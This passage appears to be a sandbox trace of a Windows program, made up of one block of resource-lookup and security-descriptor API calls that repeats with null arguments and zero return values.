lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.930] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.930] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.930] LockResource (hResData=0x0) returned 0x0 [0069.930] FreeResource (hResData=0x0) returned 0 [0069.930] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.930] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.930] LockResource (hResData=0x0) returned 0x0 [0069.930] FreeResource (hResData=0x0) returned 0 [0069.930] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.930] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.930] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.930] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.930] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.930] LockResource (hResData=0x0) returned 0x0 [0069.930] FreeResource (hResData=0x0) returned 0 [0069.930] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.930] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.930] LockResource (hResData=0x0) returned 0x0 [0069.930] FreeResource (hResData=0x0) returned 0 [0069.930] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.930] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.930] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.930] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.930] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.930] LockResource (hResData=0x0) returned 0x0 [0069.930] FreeResource (hResData=0x0) returned 0 [0069.930] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.930] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.930] LockResource (hResData=0x0) returned 0x0 [0069.930] FreeResource (hResData=0x0) returned 0 [0069.930] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.930] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.930] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.930] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.930] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.930] LockResource (hResData=0x0) returned 0x0 [0069.930] FreeResource (hResData=0x0) returned 0 [0069.930] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.930] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.930] LockResource (hResData=0x0) returned 0x0 [0069.930] FreeResource (hResData=0x0) returned 0 [0069.930] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.930] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.930] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.930] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.930] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.931] LockResource (hResData=0x0) returned 0x0 [0069.931] FreeResource (hResData=0x0) returned 0 [0069.931] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.931] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.931] LockResource (hResData=0x0) returned 0x0 [0069.931] FreeResource (hResData=0x0) returned 0 [0069.931] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.931] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.931] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.931] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.931] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.931] LockResource (hResData=0x0) returned 0x0 [0069.931] FreeResource (hResData=0x0) returned 0 [0069.931] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.931] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.931] LockResource (hResData=0x0) returned 0x0 [0069.931] FreeResource (hResData=0x0) returned 0 [0069.931] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.931] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.931] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.931] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.931] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.931] LockResource (hResData=0x0) returned 0x0 [0069.931] FreeResource (hResData=0x0) returned 0 [0069.931] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.931] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.931] LockResource (hResData=0x0) returned 0x0 [0069.931] FreeResource (hResData=0x0) returned 0 [0069.931] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.931] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.931] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.931] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.931] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.931] LockResource (hResData=0x0) returned 0x0 [0069.931] FreeResource (hResData=0x0) returned 0 [0069.931] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.931] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.931] LockResource (hResData=0x0) returned 0x0 [0069.931] FreeResource (hResData=0x0) returned 0 [0069.931] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.931] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.931] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.931] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.931] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.931] LockResource (hResData=0x0) returned 0x0 [0069.931] FreeResource (hResData=0x0) returned 0 [0069.931] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.931] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.931] LockResource (hResData=0x0) returned 0x0 [0069.931] FreeResource (hResData=0x0) returned 0 [0069.932] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.932] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.932] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.932] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.932] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.932] LockResource (hResData=0x0) returned 0x0 [0069.932] FreeResource (hResData=0x0) returned 0 [0069.932] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.932] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.932] LockResource (hResData=0x0) returned 0x0 [0069.932] FreeResource (hResData=0x0) returned 0 [0069.932] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.932] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.932] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.932] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.932] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.932] LockResource (hResData=0x0) returned 0x0 [0069.932] FreeResource (hResData=0x0) returned 0 [0069.932] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.932] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.932] LockResource (hResData=0x0) returned 0x0 [0069.932] FreeResource (hResData=0x0) returned 0 [0069.932] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.932] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.932] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.932] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.932] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.932] LockResource (hResData=0x0) returned 0x0 [0069.932] FreeResource (hResData=0x0) returned 0 [0069.932] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.932] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.932] LockResource (hResData=0x0) returned 0x0 [0069.932] FreeResource (hResData=0x0) returned 0 [0069.932] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.932] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.932] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.932] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.932] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.932] LockResource (hResData=0x0) returned 0x0 [0069.932] FreeResource (hResData=0x0) returned 0 [0069.932] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.932] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.932] LockResource (hResData=0x0) returned 0x0 [0069.932] FreeResource (hResData=0x0) returned 0 [0069.932] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.932] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.933] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.933] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.933] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.933] LockResource (hResData=0x0) returned 0x0 [0069.933] FreeResource (hResData=0x0) returned 0 [0069.933] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.933] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.933] LockResource (hResData=0x0) returned 0x0 [0069.933] FreeResource (hResData=0x0) returned 0 [0069.933] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.933] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.933] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.933] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.933] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.933] LockResource (hResData=0x0) returned 0x0 [0069.933] FreeResource (hResData=0x0) returned 0 [0069.933] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.933] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.933] LockResource (hResData=0x0) returned 0x0 [0069.933] FreeResource (hResData=0x0) returned 0 [0069.933] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.933] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.933] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.933] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.933] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.933] LockResource (hResData=0x0) returned 0x0 [0069.933] FreeResource (hResData=0x0) returned 0 [0069.933] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.933] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.933] LockResource (hResData=0x0) returned 0x0 [0069.933] FreeResource (hResData=0x0) returned 0 [0069.933] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.933] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.933] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.933] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.934] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.934] LockResource (hResData=0x0) returned 0x0 [0069.934] FreeResource (hResData=0x0) returned 0 [0069.934] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.934] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.934] LockResource (hResData=0x0) returned 0x0 [0069.934] FreeResource (hResData=0x0) returned 0 [0069.934] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.934] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.934] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.934] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.934] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.934] LockResource (hResData=0x0) returned 0x0 [0069.934] FreeResource (hResData=0x0) returned 0 [0069.934] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.934] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.934] LockResource (hResData=0x0) returned 0x0 [0069.934] FreeResource (hResData=0x0) returned 0 [0069.934] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.934] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.934] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.934] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.934] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.934] LockResource (hResData=0x0) returned 0x0 [0069.934] FreeResource (hResData=0x0) returned 0 [0069.934] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.934] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.934] LockResource (hResData=0x0) returned 0x0 [0069.934] FreeResource (hResData=0x0) returned 0 [0069.934] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.934] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.934] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.934] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.934] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.934] LockResource (hResData=0x0) returned 0x0 [0069.934] FreeResource (hResData=0x0) returned 0 [0069.934] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.934] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.934] LockResource (hResData=0x0) returned 0x0 [0069.934] FreeResource (hResData=0x0) returned 0 [0069.934] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.934] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.934] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.934] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.934] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.934] LockResource (hResData=0x0) returned 0x0 [0069.934] FreeResource (hResData=0x0) returned 0 [0069.934] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.934] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.934] LockResource (hResData=0x0) returned 0x0 [0069.935] FreeResource (hResData=0x0) returned 0 [0069.935] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.935] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.935] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.935] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.935] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.935] LockResource (hResData=0x0) returned 0x0 [0069.935] FreeResource (hResData=0x0) returned 0 [0069.935] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.935] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.935] LockResource (hResData=0x0) returned 0x0 [0069.935] FreeResource (hResData=0x0) returned 0 [0069.935] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.935] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.935] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.935] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.935] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.935] LockResource (hResData=0x0) returned 0x0 [0069.935] FreeResource (hResData=0x0) returned 0 [0069.935] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.935] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.935] LockResource (hResData=0x0) returned 0x0 [0069.935] FreeResource (hResData=0x0) returned 0 [0069.935] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.935] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.935] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.935] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.935] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.935] LockResource (hResData=0x0) returned 0x0 [0069.935] FreeResource (hResData=0x0) returned 0 [0069.935] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.935] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.935] LockResource (hResData=0x0) returned 0x0 [0069.935] FreeResource (hResData=0x0) returned 0 [0069.935] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.935] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.935] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.935] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.935] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.935] LockResource (hResData=0x0) returned 0x0 [0069.935] FreeResource (hResData=0x0) returned 0 [0069.935] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.935] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.936] LockResource (hResData=0x0) returned 0x0 [0069.936] FreeResource (hResData=0x0) returned 0 [0069.936] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.936] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.936] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.936] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.936] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.936] LockResource (hResData=0x0) returned 0x0 [0069.936] FreeResource (hResData=0x0) returned 0 [0069.936] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.936] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.936] LockResource (hResData=0x0) returned 0x0 [0069.936] FreeResource (hResData=0x0) returned 0 [0069.936] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.936] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.936] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.936] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 